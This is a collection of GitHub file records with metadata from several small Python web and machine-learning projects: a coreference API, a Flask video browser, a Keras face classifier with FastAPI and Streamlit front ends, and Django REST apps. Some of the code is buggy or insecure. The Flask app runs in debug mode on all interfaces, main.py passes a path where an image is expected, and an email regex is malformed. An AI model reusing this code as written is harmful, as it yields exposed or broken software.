"blob_id": "e7e61299917dbffa0508982c17cfeda49ff89f2f",
"content_id": "d8014c2502bda36025b48cce9316908b7dff6823",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 430,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 19,
"path": "/coref.py",
"repo_name": "mouryabs/Coherence-Resolution-Resolver",
"src_encoding": "UTF-8",
"text": "import spacy\nimport neuralcoref\n\n## Input: text - string of the text\n## Output: modified text \ndef coref(text):\n nlp = spacy.load(\"en_core_web_md\")\n\n neuralcoref.add_to_pipe(nlp)\n doc = nlp(text)\n return doc._.coref_resolved\n\n\n\nif __name__ == \"__main__\":\n text = \"Barack Obama is the first president of US. He is from Hawaii and his wife is Michelle\"\n print(coref(text))\n\nprint(coref(\"Mourya is good. He is awesome\"))\n"
},
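Beyond `coref_resolved`, neuralcoref also exposes the underlying clusters on the document; a short sketch using the same pipeline as coref.py above:

```python
# Inspecting coreference clusters with the neuralcoref spaCy extension.
import spacy
import neuralcoref

nlp = spacy.load("en_core_web_md")
neuralcoref.add_to_pipe(nlp)

doc = nlp("Barack Obama is the first president of US. He is from Hawaii.")
print(doc._.has_coref)                       # True if any cluster was found
for cluster in doc._.coref_clusters:
    print(cluster.main, "->", cluster.mentions)
```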
{
"alpha_fraction": 0.6754098534584045,
"alphanum_fraction": 0.6754098534584045,
"avg_line_length": 19.33333396911621,
"blob_id": "016cfcefaa3056744aa042e0256590223686ae63",
"content_id": "0bb960f7de6f247004172e5b503d1c850292fafd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 305,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 15,
"path": "/README.md",
"repo_name": "mouryabs/Coherence-Resolution-Resolver",
"src_encoding": "UTF-8",
"text": "# Coherence-Resolution-Resolver\nUses Neural Core Ref to perform coherence resolution, and serves it through REST API.\n\nRun the Docker File, to start the Flask Server.\n\nGET, and POST.\n\nInput Format:\\\n {\\\n \"text\" : \"text that you need to send\"\\\n }\\\nOutput Format:\\\n {\\\n \"text\" : \"output text\"\\\n }\n"
}
] | 5 |
liantian-cn/Inori | https://github.com/liantian-cn/Inori | 0afc4914615f9afcedcce8c172bed71d5d3d977f | f8c444dc0c916e1ec27f0749c42a3b5d6c5d9e2c | 2d25701c878628e67df362fb4a007805ce404dfc | refs/heads/master | 2020-04-07T01:58:40.226859 | 2018-11-19T12:51:25 | 2018-11-19T12:51:25 | 157,959,394 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6390020251274109,
"alphanum_fraction": 0.6466395258903503,
"avg_line_length": 28.75757598876953,
"blob_id": "8ea0851b785be926e7e245413d01e6c4c65a005d",
"content_id": "db893584224d22d2b36b59a91281446090e79822",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1964,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 66,
"path": "/Inori.py",
"repo_name": "liantian-cn/Inori",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# __author__ = 'Liantian'\n# __email__ = \"[email protected]\"\n\nfrom flask import Flask, send_file, redirect, render_template, url_for, request, send_from_directory\nfrom pathlib import Path\nimport random\nimport json\nimport os\n\napp = Flask(__name__)\napp.debug = True\n\nbase_dir = Path(r\"E:\\S-Cute\")\n\n\[email protected]('/')\ndef index():\n content_dir = base_dir.joinpath(\"contents\")\n content_list = list(content_dir.iterdir())\n random_slug = random.choice(content_list).relative_to(content_dir).__str__()\n # return redirect(url_for(\"content\", content_slug=random_slug), code=302)\n return content(random_slug)\n\n\[email protected](\"/contents/<string:content_slug>/\")\ndef content(content_slug):\n content_path = base_dir.joinpath(\"contents\").joinpath(content_slug)\n videos = []\n ext_name = ('mp4', \"wmv\", 'avi')\n for root, dirnames, fns in os.walk(content_path.__str__()):\n for fn in fns:\n if fn.lower().endswith(ext_name):\n videos.append(fn)\n json_file = content_path.joinpath(\"info.json\")\n with open(json_file) as f:\n data = json.load(f)\n return render_template('content.html', content=data, videos=videos)\n\n\[email protected](\"/girls/<string:girl_slug>/\")\ndef girl(girl_slug):\n girl_path = base_dir.joinpath(\"girls\").joinpath(girl_slug)\n json_file = girl_path.joinpath(\"info.json\")\n with open(json_file) as f:\n data = json.load(f)\n return render_template('girl.html', girl=data)\n\n\[email protected](\"/tag/<string:tag_title>/\")\ndef tag(tag_title):\n girl_path = base_dir.joinpath(\"tags\")\n json_file = girl_path.joinpath(\"{0}.json\".format(tag_title))\n with open(json_file) as f:\n data = json.load(f)\n return render_template('tag.html', tag=data)\n\n\[email protected]('/download/<path:filename>')\ndef download(filename):\n return send_from_directory(base_dir, filename, as_attachment=True)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000)\n"
}
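Since Inori.py already uses `pathlib`, the `os.walk` video scan in `content()` could be expressed with `rglob`; a small sketch under the same extension set, with an illustrative helper name:

```python
# pathlib-based alternative to the os.walk loop in content().
from pathlib import Path


def find_videos(content_path: Path):
    exts = {".mp4", ".wmv", ".avi"}
    # recurse through the content folder and keep matching file names
    return [p.name for p in content_path.rglob("*") if p.suffix.lower() in exts]
```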
] | 1 |
twinstae/joyuris-classifier | https://github.com/twinstae/joyuris-classifier | 7bec24bb2439f2b98e86cce4bc3f384e10bb8b83 | 99ca16c8c5ee7ee2bc893d39eaed4102de373580 | 6ac13efadd9f5e578d042ba6686edb0a05516d3b | refs/heads/main | 2023-03-23T19:00:40.861436 | 2021-03-10T09:23:34 | 2021-03-10T09:23:34 | 346,246,085 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5459688901901245,
"alphanum_fraction": 0.5827440023422241,
"avg_line_length": 26.19230842590332,
"blob_id": "3284722119f2cb149ab4744fbfec8e405a2dfc2f",
"content_id": "99f6d0b29477a1dbb780e267fcfe35dd1b07ba5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 769,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 26,
"path": "/model.py",
"repo_name": "twinstae/joyuris-classifier",
"src_encoding": "UTF-8",
"text": "import os\nfrom keras.models import load_model\nimport numpy as np\ncheckpoint_dir = os.getcwd()+\"/model/\"\nmodel = load_model(checkpoint_dir+\"weight_1.hdf5\")\n\ntarget_x = 224\ntarget_y = 224\nCATEGORIES = [\"최예나\", \"조유리\", \"김채원\"]\n\n\ndef predict(img):\n img = img.convert(\"RGB\")\n img = img.resize((target_x, target_y))\n data = np.asarray(img)\n raw_x = np.array(data)\n float_x = raw_x.astype(\"float\") / 256\n x = float_x.reshape(-1, target_x, target_y, 3)\n pred = model.predict(x)[0]\n result = CATEGORIES[int(np.argmax(pred))] # 예측 값중 가장 높은 클래스 반환\n\n return result, {\n \"최예나\": int(100 * pred[0]),\n \"조유리\": int(100 * pred[1]),\n \"김채원\": int(100 * pred[2])\n }\n"
},
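A usage sketch for `predict` above: it expects an already-opened PIL image, not a file path. The file name here is a placeholder:

```python
# Calling model.predict with a PIL image; the file name is hypothetical.
from PIL import Image
from model import predict

label, scores = predict(Image.open("sample_face.jpg"))
print(label)   # best-scoring category
print(scores)  # per-category percentages
```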
{
"alpha_fraction": 0.45255473256111145,
"alphanum_fraction": 0.6788321137428284,
"avg_line_length": 14.333333015441895,
"blob_id": "334ab345db441937adb0c99f3af06cc0eb771546",
"content_id": "9c16c399f5066c5913f1abd5289abac06976e077",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 137,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 9,
"path": "/requirements.txt",
"repo_name": "twinstae/joyuris-classifier",
"src_encoding": "UTF-8",
"text": "bokeh==2.2.3\nnumpy==1.19.5\nstarlette==0.13.6\ntensorflow==2.4.1\nKeras==2.4.3\npandas==1.2.2\nstreamlit==0.77.0\nfastapi==0.63.0\nPillow==8.1.2"
},
{
"alpha_fraction": 0.6253687143325806,
"alphanum_fraction": 0.6253687143325806,
"avg_line_length": 24.11111068725586,
"blob_id": "80ff55c1b88adf2a8e15a7d163cd2cf074deccd2",
"content_id": "4eebd2f73b6a402650b23f80e487c0aaa9d90769",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 678,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 27,
"path": "/main.py",
"repo_name": "twinstae/joyuris-classifier",
"src_encoding": "UTF-8",
"text": "from fastapi import FastAPI, UploadFile, File\nfrom starlette.responses import HTMLResponse\nfrom model import predict\nimport os\napp = FastAPI()\n\n\[email protected](\"/\")\ndef main():\n content = \"\"\"\n <body>\n <form action=\"/upload\" enctype=\"multipart/form-data\" method=\"post\">\n <input name=\"image\" type=\"file\">\n <input type=\"submit\">\n </form>\n </body>\n \"\"\"\n return HTMLResponse(content=content)\n\n\[email protected](\"/upload\")\ndef upload_file(image: UploadFile = File(...)):\n file_name = os.getcwd() + \"/img/test/\" + image.filename.replace(\" \", \"-\")\n with open(file_name, 'wb+') as f:\n f.write(image.file.read())\n f.close()\n return predict(file_name)\n"
},
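A hedged client-side sketch for exercising the `/upload` route above with `requests`, assuming the app is served on uvicorn's default port 8000 (the file name is hypothetical):

```python
import requests

# The multipart field name must match the endpoint's parameter: "image"
with open("sample.jpg", "rb") as f:  # hypothetical file
    resp = requests.post("http://localhost:8000/upload", files={"image": f})
print(resp.json())  # the (label, probability dict) pair serialised by FastAPI
```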
{
"alpha_fraction": 0.6337920427322388,
"alphanum_fraction": 0.6475535035133362,
"avg_line_length": 30.14285659790039,
"blob_id": "feca8d08078a4d5cf994432c7475a83943dd5d9f",
"content_id": "45da924c5e6aab565a82dc021b8c1c00484fd183",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1378,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 42,
"path": "/streamlit_app.py",
"repo_name": "twinstae/joyuris-classifier",
"src_encoding": "UTF-8",
"text": "import streamlit as st\nimport pandas as pd\nfrom math import pi\n\nfrom PIL import Image\nfrom bokeh.plotting import figure\nfrom bokeh.transform import cumsum\nfrom model import predict\n\n\ndef create_pie_chart(probability_dict):\n data = pd.Series(probability_dict).reset_index(name='value').rename(columns={'index': 'candidate'})\n data['angle'] = data['value'] / data['value'].sum() * 2 * pi\n data['color'] = ['#ccebc5', '#fed9a6', '#ffffcc']\n\n print(data)\n\n p = figure(plot_height=350, title=\"신경망이 예측한 확률 비율\", toolbar_location=None,\n tools=\"hover\", tooltips=\"@candidate: @value\", x_range=(-0.5, 1.0))\n\n p.wedge(x=0, y=1, radius=0.4,\n start_angle=cumsum('angle', include_zero=True), end_angle=cumsum('angle'),\n line_color=\"white\", fill_color='color', legend_field='candidate', source=data)\n\n p.axis.axis_label = None\n p.axis.visible = False\n p.grid.grid_line_color = None\n st.bokeh_chart(p, use_container_width=False)\n\n\nst.title(\"조유리즈 판별기\")\nuploaded_file = st.file_uploader(\"얼굴만 자른 사진을 올려주세요...\", type=\"jpg\")\nif uploaded_file is not None:\n img = Image.open(uploaded_file)\n prediction, probability = predict(img)\n st.image(\n img,\n width=256,\n caption=f\"이 사람은... {prediction}!\",\n )\n\n create_pie_chart(probability)\n"
}
] | 4 |
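The wedges in `create_pie_chart` get their extents from a cumulative-sum transform over the class probabilities; a standalone sketch of just that data preparation (the numbers are made up):

```python
from math import pi
import pandas as pd

probability_dict = {"최예나": 10, "조유리": 80, "김채원": 10}  # made-up sample
data = pd.Series(probability_dict).reset_index(name='value').rename(columns={'index': 'candidate'})
# Each wedge spans a share of the full circle proportional to its probability
data['angle'] = data['value'] / data['value'].sum() * 2 * pi
print(data[['candidate', 'value', 'angle']])
```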
porrametict/django_and_vuejs | https://github.com/porrametict/django_and_vuejs | 8c69239590b26ad4068155237e7f7c4d56686383 | dba111fe4539c2b8cfb7b34a9eb09d636f13df2d | 9664e90de314d134ea613173f670b1be0cd6a632 | refs/heads/master | 2021-02-03T22:05:47.814962 | 2020-02-27T16:01:12 | 2020-02-27T16:01:12 | 243,554,000 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6363636255264282,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 20,
"blob_id": "4a01993ef61ee676326bc82ec371aa52bf33aa0c",
"content_id": "c591bc3fe11196789e2e65a6d4d24dee2bb7e184",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 22,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 1,
"path": "/README.md",
"repo_name": "porrametict/django_and_vuejs",
"src_encoding": "UTF-8",
"text": "\"# django_and_vuejs\" \n"
},
{
"alpha_fraction": 0.719584584236145,
"alphanum_fraction": 0.7225519418716431,
"avg_line_length": 32.70000076293945,
"blob_id": "a089ebd3c2d50909fcb65cb243bcdbdc6642e3f3",
"content_id": "e7372ab73d1c310b421fec5d623ceb99b8cbf659",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 674,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 20,
"path": "/django_server/test_meme/borrowing/models.py",
"repo_name": "porrametict/django_and_vuejs",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n\n# Create your models here.\nclass Product(models.Model):\n name = models.CharField(max_length=50)\n volume = models.IntegerField()\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return \"{}\".format(self.name)\n\n\nclass Borrowing(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n created_at = models.DateTimeField(auto_now_add=True, null=True)\n updated_at = models.DateTimeField(auto_now=True, null=True)\n"
},
{
"alpha_fraction": 0.6931216716766357,
"alphanum_fraction": 0.6931216716766357,
"avg_line_length": 24.727272033691406,
"blob_id": "3f43a3da7d3e7d54c775e01d29a796dd59d03a38",
"content_id": "6751ba2e19454b4584259ca7a8cc6c9a803dc0eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 567,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 22,
"path": "/django_server/test_meme/borrowing/serializer.py",
"repo_name": "porrametict/django_and_vuejs",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import User\nfrom rest_framework import serializers\nfrom .models import Borrowing, Product\n\n\n# Serializers define the API representation.\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ['id', 'username', 'email', 'is_staff']\n\n\nclass ProductSerializers(serializers.ModelSerializer):\n class Meta:\n model = Product\n fields = '__all__'\n\n\nclass BorrowingSerializers(serializers.ModelSerializer):\n class Meta:\n model = Borrowing\n fields = '__all__'\n\n"
},
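A short Django-shell sketch of how the serializers above are typically exercised (the model values are made up):

```python
# Run inside `python manage.py shell`
from borrowing.models import Product
from borrowing.serializer import ProductSerializers

# Serialising an instance to plain data
p = Product.objects.create(name='Projector', volume=3)  # made-up values
print(ProductSerializers(p).data)

# Validating inbound data before saving
s = ProductSerializers(data={'name': 'HDMI cable', 'volume': 10})
print(s.is_valid(), s.errors)
```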
{
"alpha_fraction": 0.7836257219314575,
"alphanum_fraction": 0.7836257219314575,
"avg_line_length": 27.5,
"blob_id": "e9572890f6be59022e0407e908e2d27eebe5e793",
"content_id": "1eba629e7ae412b8e190af061e95b79852479be5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 342,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 12,
"path": "/django_server/test_meme/borrowing/urls.py",
"repo_name": "porrametict/django_and_vuejs",
"src_encoding": "UTF-8",
"text": "from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\nfrom borrowing import views\n\nrouter = DefaultRouter()\nrouter.register(r'product', views.ProductViewSet)\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'borrow', views.BorrowingViewSet)\n\nurlpatterns = [\n path('', include(router.urls)),\n]\n"
},
{
"alpha_fraction": 0.5418118238449097,
"alphanum_fraction": 0.5749129056930542,
"avg_line_length": 23.95652198791504,
"blob_id": "e2a9082da9e571cb8749e9dc3ad2034b6d8a0938",
"content_id": "6e861a8b3d93196aecb3efae0c63bd018863bdf7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 574,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 23,
"path": "/django_server/test_meme/borrowing/migrations/0002_auto_20200227_1905.py",
"repo_name": "porrametict/django_and_vuejs",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2.8 on 2020-02-27 12:05\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('borrowing', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='borrowing',\n name='created_at',\n field=models.DateTimeField(auto_now_add=True, null=True),\n ),\n migrations.AddField(\n model_name='borrowing',\n name='updated_at',\n field=models.DateTimeField(auto_now=True, null=True),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7160603404045105,
"alphanum_fraction": 0.7160603404045105,
"avg_line_length": 30.30555534362793,
"blob_id": "1a9195bcaf0f855503cbb409ad1133a768bc0c7c",
"content_id": "7697257c73d15e4f43930cd05d6dcd23deb9a7cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1127,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 36,
"path": "/django_server/test_meme/borrowing/views.py",
"repo_name": "porrametict/django_and_vuejs",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import User\nfrom django.shortcuts import render\nfrom rest_framework.response import Response\n\nfrom .serializer import ProductSerializers, UserSerializer, BorrowingSerializers\nfrom .models import Product, Borrowing\nfrom rest_framework import viewsets\n\n\n# Create your views here.\n\nclass ProductViewSet(viewsets.ModelViewSet):\n queryset = Product.objects.all()\n serializer_class = ProductSerializers\n\n\n# ViewSets define the view behavior.\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n \nclass BorrowingViewSet(viewsets.ModelViewSet):\n queryset = Borrowing.objects.all()\n serializer_class = BorrowingSerializers\n\n def list(self, request):\n b = Borrowing.objects.all()\n b_data = BorrowingSerializers(b, many=True).data\n for i in range(len(b_data)):\n user_data = UserSerializer(b[i].user).data\n b_data[i]['user'] = user_data\n product_data = ProductSerializers(b[i].product).data\n b_data[i]['product'] = product_data\n\n return Response(b_data)\n"
}
] | 6 |
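The `list()` override in `BorrowingViewSet` above swaps the user and product primary keys for full objects by hand; a common DRF alternative — a sketch, not the repository's code — is to declare the nesting on the serializer so the default `list()` works unchanged:

```python
from rest_framework import serializers
from borrowing.models import Borrowing
from borrowing.serializer import UserSerializer, ProductSerializers

class BorrowingReadSerializer(serializers.ModelSerializer):
    # Nested serializers render the related objects inline instead of as PKs
    user = UserSerializer(read_only=True)
    product = ProductSerializers(read_only=True)

    class Meta:
        model = Borrowing
        fields = '__all__'
```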
ohwani/molla | https://github.com/ohwani/molla | ee97283060f221141877f56b1fd31556a8a41329 | 622fb3d72f4830eb69362013d3ed1b3c911efc3f | 377ed1a7b5fe613c9cb13fbb19a37cfc4081be42 | refs/heads/main | 2023-03-25T03:27:54.693675 | 2021-03-25T14:32:16 | 2021-03-25T14:32:16 | 347,636,284 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6989924311637878,
"alphanum_fraction": 0.7141057848930359,
"avg_line_length": 28.44444465637207,
"blob_id": "6107566ca105a218d1994978e8f43443fcf5ea60",
"content_id": "ad7439facbd35a05c1aa39391046dc491ccb90d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 794,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 27,
"path": "/accounts/models.py",
"repo_name": "ohwani/molla",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import AbstractUser\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom .managers import CustomUserManager\n\n\nclass User(AbstractUser):\n username = None\n last_name = None\n first_name = None\n email = models.EmailField(unique=True)\n password = models.CharField(max_length=128)\n\n USERNAME_FIELD = 'email'\n REQUIRED_FIELDS = []\n\n objects = CustomUserManager()\n\n name = models.CharField(blank=True, max_length=100)\n address = models.CharField(blank=True, max_length=200)\n phone = models.CharField(blank=True, max_length=100)\n date_of_birth = models.DateField(blank=True, null=True)\n profile_image = models.ImageField(blank=True, null= True)\n\n def __str__(self):\n return self.email"
},
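`managers.py` is not included in this snapshot; a typical email-as-username manager for the model above looks roughly like this (a sketch under that assumption, not the repository's actual code):

```python
from django.contrib.auth.base_user import BaseUserManager

class CustomUserManager(BaseUserManager):
    # With USERNAME_FIELD = 'email', user creation must key on email, not username
    def create_user(self, email, password, **extra_fields):
        if not email:
            raise ValueError('The email must be set')
        user = self.model(email=self.normalize_email(email), **extra_fields)
        user.set_password(password)  # stores a salted hash, never the raw password
        user.save()
        return user

    def create_superuser(self, email, password, **extra_fields):
        extra_fields.setdefault('is_staff', True)
        extra_fields.setdefault('is_superuser', True)
        return self.create_user(email, password, **extra_fields)
```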
{
"alpha_fraction": 0.8217054009437561,
"alphanum_fraction": 0.8217054009437561,
"avg_line_length": 31.25,
"blob_id": "e0e119ac9bf1de330c737708395d3c52fe866ce0",
"content_id": "c3d7d2bd131d890821c863efbc29dbd70e2ab9b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 4,
"path": "/post/views.py",
"repo_name": "ohwani/molla",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\n# Create your views here.\n# from rest_framework.gnerics import ListAPIview, RetrieveAPIView "
},
{
"alpha_fraction": 0.40789473056793213,
"alphanum_fraction": 0.4736842215061188,
"avg_line_length": 24.33333396911621,
"blob_id": "1a9a9a121f79274f6987d75f8354ec0a78f4f915",
"content_id": "e6061703bc4f2ba34696532d1fa563a78987fb5f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 152,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 6,
"path": "/accounts/regex.py",
"repo_name": "ohwani/molla",
"src_encoding": "UTF-8",
"text": "EMAIL_RegEx = r'/^[0-9a-zA-Z]([-_.]?[0-9a-zA-Z])*@[0-9a-zA-Z]([-_.]?[0-9a-zA-Z])*.[a-zA-Z]{2,3}$/i'\n\n\nMessage = {\n 'email': 'INVALID EMAIL FORMAT'\n}\n"
},
{
"alpha_fraction": 0.6714116334915161,
"alphanum_fraction": 0.6714116334915161,
"avg_line_length": 37.318180084228516,
"blob_id": "4540bd73594100d7cc9cf93fe2fbb5bb04a91edc",
"content_id": "cd0d7bf2d9aed9c37587a445a9c1cd11047cf0cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1686,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 44,
"path": "/accounts/urls.py",
"repo_name": "ohwani/molla",
"src_encoding": "UTF-8",
"text": "from django.urls import path, include\n# from rest_framework_simplejwt import views as jwt_views\nfrom . import views\n# from files.api.views import ProfileList\nfrom rest_framework.routers import DefaultRouter\n# from rest_framework_simplejwt.views import (\n# TokenObtainPairView,\n# TokenRefreshView, \n# TokenVerifyView\n# )\nrouter = DefaultRouter()\nrouter.register('', views.UserViewSet)\n# router.register('login', views.)\n\n\nurlpatterns = [\n path('', include(router.urls)),\n # path('gettoken/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n # path('refreshtoken/', TokenRefreshView.as_view(), name='token_refresh'),\n # path('verifytoken/', TokenVerifyView.as_view(), name='token_verify'),\n # path('user/', views.UserViewSet.as_view(), name='signup'),\n \n\n # path('', views.accountsOverview, name=\"account-overview\"),\n # path('user-list/', views.userList, name=\"user-list\"),\n # path('user-list/<int:pk>/', views.userDetail, name=\"user-detail\"),\n # path('user-create/', views.userCreate, name=\"user-create\"),\n # path('user-update/<int:pk>/', views.userUpdate, name=\"user-update\"),\n # path('user-delete/<int:pk>/', views.userDelete, name=\"user-delete\"),\n # path('userdetail/<int:pk>/', views.userDetail, name=\"user-Detail\"),\n # path('userlist/', views.userDetail, name=\"user-Detail\"),\n # path('user/', views.UserListMixins.as_view()),\n # path('userdetail/<int:pk>/', views.UserDetailMixins.as_view()),\n]\n\n\n# from django.urls import path, include\n# from . import views\n\n# urlpatterns = [\n# # FBV\n# path('user/', views.UserListAPIView.as_view()),\n# path('user/<int:pk>/',views.UserDetailAPIView.as_view()),\n# ]\n"
},
{
"alpha_fraction": 0.5231788158416748,
"alphanum_fraction": 0.7284768223762512,
"avg_line_length": 17.875,
"blob_id": "aec13484fe045ab9dbf058b3c383430cecb8b778",
"content_id": "4ecce6c89281d3583ae630870268a3a577f2d8a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 151,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 8,
"path": "/requirements.txt",
"repo_name": "ohwani/molla",
"src_encoding": "UTF-8",
"text": "asgiref==3.3.1\ncertifi==2020.12.5\nDjango==3.1.6\ndjango-cors-headers==3.7.0\ndjangorestframework==3.12.2\nmysqlclient==2.0.3\npytz==2021.1\nsqlparse==0.4.1\n"
},
{
"alpha_fraction": 0.6388888955116272,
"alphanum_fraction": 0.6410256624221802,
"avg_line_length": 29.5,
"blob_id": "c81fabceaca6cd09a05cc98b327e2d982dacc91b",
"content_id": "8780bfe555e0f001398a8328585a999afe7b4744",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1414,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 46,
"path": "/accounts/views.py",
"repo_name": "ohwani/molla",
"src_encoding": "UTF-8",
"text": "# from rest_framework import status\n# from rest_framework.views import APIView\n# from rest_framework.response import Response\nfrom rest_framework import viewsets\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework import viewsets, permissions, authentication\n# from rest_framework.permissions import AllowAny, IsAuthenticated\n\nfrom .serializers import (\n UserSerializer,\n)\n\nfrom .models import User\n\n# class UserRegisterationView(APIView):\n# serializer_class = UserRegisterSerializer\n# # permission_classes = (AllowAny)\n\n# def post(self, request):\n# serializer = self.serializer_class(data=request.data)\n# vaild = serializer.is_valid(rasie_exception=True)\n\n# if valid:\n# serializer.save()\n# status_code = status.HTTP_201_CREATED\n\n# response = {\n# 'success': True,\n# 'statusCode': status_code,\n# 'message': 'User successfully registered!',\n# 'user': serializer.data\n# }\n\n# return Response(response, status=status_code)\n\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n permissions_classes = [AllowAny]\n\n # @action(detail=False)\n # def create(self, request, *args, **kwargs):\n # '''\n # 사용자 등록\n # '''\n # data = request.data\n\n"
},
{
"alpha_fraction": 0.6713147163391113,
"alphanum_fraction": 0.6772908568382263,
"avg_line_length": 34.92856979370117,
"blob_id": "f609d34acd43ddd5ecb3aa3319ad3f0ce41c7db5",
"content_id": "e9510eec3711c9d01ede39cc02cd9503887545c7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 502,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 14,
"path": "/post/models.py",
"repo_name": "ohwani/molla",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n# Create your models here.\n# class Post(models.Model):\n# user = models.ForeignKey(settings.AUTH_USER_MODEL)\n# title = models.CharField(max_length=120)\n# slug = models.SlugField(unique=True)\n# image = models.ImageField()\n# content = models.TextField()\n# create_at = models.DateTimeField(auto_now=True, auto_now_add=False)\n# update_at = models.DateTimeField(auto_now=True, auto_now_add=False)\n\n# def __str__(self):\n# return self.title"
},
{
"alpha_fraction": 0.5668638944625854,
"alphanum_fraction": 0.5684418082237244,
"avg_line_length": 30.662500381469727,
"blob_id": "1d13fa8ee1bc429ff6e7a825b582a64d216a71d4",
"content_id": "2f2f823176f98f0c6cf058a761d7c842fbbd898d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2535,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 80,
"path": "/accounts/serializers.py",
"repo_name": "ohwani/molla",
"src_encoding": "UTF-8",
"text": "# from django.contrib.auth import authenticate\n\nfrom rest_framework import serializers\nfrom rest_framework.validators import UniqueTogetherValidator\n# from rest_framework_simplejwt.serializers import TokenObtainSerializer\n# from rest_framework_simplejwt.tokens import RefreshToken\n\nfrom .models import User\nimport re\n\n\nclass UserSerializer(serializers.ModelSerializer):\n \n class Meta:\n model = User\n fields = '__all__'\n extra_kwargs = {\n 'password' : {'write_only': True}\n }\n\n validators = [\n UniqueTogetherValidator(\n queryset = User.objects.all(),\n fields = ['email'],\n message = 'This email already exists'\n )\n ]\n def validate(self, attrs):\n check_password = re.compile('^(?=.*[A-Za-z])(?=.*\\d)(?=.*[$@$!%*#?&])[A-Za-z\\d$@$!%*#?&]{8,}$')\n email = attrs.get('email', None) \n password = attrs.get('password', None)\n password2 = attrs.get('password2', None)\n\n if not re.match(check_password, attrs['password']):\n raise serializers.ValidationError({'password': 'Please check your password.'})\n\n if password != password2:\n raise serializers.ValidationError({'password': 'Passwords must match.'})\n \n return attrs\n\n\n# class LoginSerializer(serializers.Serializer):\n\n# class Meta:\n# model = User\n# fields = ['emali', 'passowrd']\n \n# def validate(self, attrs):\n# email = attrs.get('email', None) \n# password = attrs.get('password', None)\n# user = authenticate(email=email, 